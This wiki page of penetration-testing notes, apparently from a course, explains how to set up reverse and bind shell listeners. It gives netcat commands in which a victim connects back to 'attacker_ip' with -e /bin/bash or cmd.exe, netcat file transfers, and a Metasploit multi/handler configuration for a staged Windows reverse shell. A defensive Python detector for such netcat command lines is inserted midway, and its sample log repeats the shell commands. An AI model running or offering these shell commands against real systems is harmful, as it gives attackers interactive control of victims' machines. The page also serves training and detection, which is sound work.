Create reverse shell listener
lethanhtung01011980 edited this page Apr 23, 2020
Refs:
- Staged vs. stageless handlers: https://buffered.io/posts/staged-vs-stageless-handlers/
- Listen on TCP/UDP port for reverse shell: nc -nlvp 5678
- Connect to a netcat port: nc -nv $ip 5678
- Send a file using netcat: nc -nv $ip 5678 < /usr/share/windows-binaries/wget.exe
- Receive a file using netcat: nc -nlvp 5678 > incoming.exe
- Avoid using port 4444, since other students may be using it too.
- Set FTP to binary mode before uploading an exe file: ftp> binary
- Relevant options from the netcat help output (root@kali:~# nc -h):
- -c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
- -l listen mode, for inbound connects
- -n numeric-only IP addresses, no DNS
- -p port local port number
- -v verbose [use twice to be more verbose]
- Use -e /bin/bash for a Linux victim and -e cmd.exe for a Windows victim
- Victim can ping attacker (reverse shell: the victim connects back to the attacker):
- Attacker to listen: nc -nlvp 4444
- Linux victim to execute reverse shell: nc -nv attacker_ip 4444 -e /bin/bash
- Windows victim to execute reverse shell: nc.exe -nv attacker_ip 4444 -e cmd.exe
- Attacker can ping victim (bind shell: the victim listens and the attacker connects):
- Windows victim to listen: nc.exe -nlvp 4444 -e cmd.exe
- Linux victim to listen: nc -nlvp 4444 -e /bin/bash
- Attacker to connect to victim: nc -nv victim_ip 4444
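Every netcat shell above, reverse or bind, shares one observable trait on the victim host: netcat started with -e or -c, the option nc -h itself marks as dangerous. As an added example (not part of these notes), the Python script below classifies process-creation command lines on that trait so a defender can flag them in logs; the log lines, host names, users and the IP 10.0.0.5 are constructed.

```python
import re
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}

# Constructed process-creation log lines (one command line per event); the
# host names, users and the IP 10.0.0.5 are made up for this example.
SAMPLE_LOG = r"""
2020-04-23T10:00:01Z host=web01 user=www-data cmd="nc -nv 10.0.0.5 4444 -e /bin/bash"
2020-04-23T10:00:02Z host=ws07 user=alice cmd="C:\Tools\nc.exe -nlvp 4444 -e cmd.exe"
2020-04-23T10:00:03Z host=web01 user=root cmd="nc -nlvp 5678"
2020-04-23T10:00:04Z host=web01 user=ops cmd="nc -nv 10.0.0.5 5678 < /tmp/wget.exe"
2020-04-23T10:00:05Z host=web01 user=ops cmd="tar czf backup.tgz /srv"
"""

def basename(path):
    """Strip directory components (either separator style) and lower-case."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(cmdline):
    """Return reverse_shell, bind_shell, netcat_other or benign for one command line."""
    argv = shlex.split(cmdline, posix=False)  # non-POSIX mode keeps Windows backslashes
    if not argv or basename(argv[0]) not in NETCAT_NAMES:
        return "benign"
    listen, exec_prog = False, None
    for i, tok in enumerate(argv[1:], start=1):
        if not tok.startswith("-") or tok.startswith("--"):
            continue
        flags = tok[1:]  # grouped short options such as -nlvp
        listen = listen or "l" in flags
        # -e and -c (marked "dangerous" in nc -h) take the program to run as the next token
        if ("e" in flags or "c" in flags) and i + 1 < len(argv):
            exec_prog = argv[i + 1]
    if exec_prog is None:
        return "netcat_other"  # e.g. a bare listener or a file transfer
    return "bind_shell" if listen else "reverse_shell"

def scan(log_text):
    """Pair every cmd="..." field in the log with its classification."""
    results = []
    for line in log_text.splitlines():
        m = re.search(r'cmd="([^"]*)"', line)
        if m:
            results.append((m.group(1), classify(m.group(1))))
    return results

if __name__ == "__main__":
    for cmd, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:14} {cmd}")
```

Plain listeners and file transfers are reported as netcat_other so they stay visible without being confused with a shell.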
- For a STAGELESS (unstaged) reverse shell a plain netcat listener is enough: nc -nlvp 5678
- For a STAGED reverse shell use the Metasploit handler, since netcat cannot deliver the second stage (ref: https://blog.rapid7.com/2009/12/28/exploiting-microsoft-iis-with-metasploit):
- msfconsole
- msf> use exploit/multi/handler
- msf (handler) > set PAYLOAD windows/shell/reverse_tcp
- msf (handler) > set LHOST Attacker_IP
- msf (handler) > set LPORT 5678
- msf (handler) > set ExitOnSession false
- msf (handler) > exploit -j
- msf exploit(handler) > sessions -i 1
- meterpreter > shell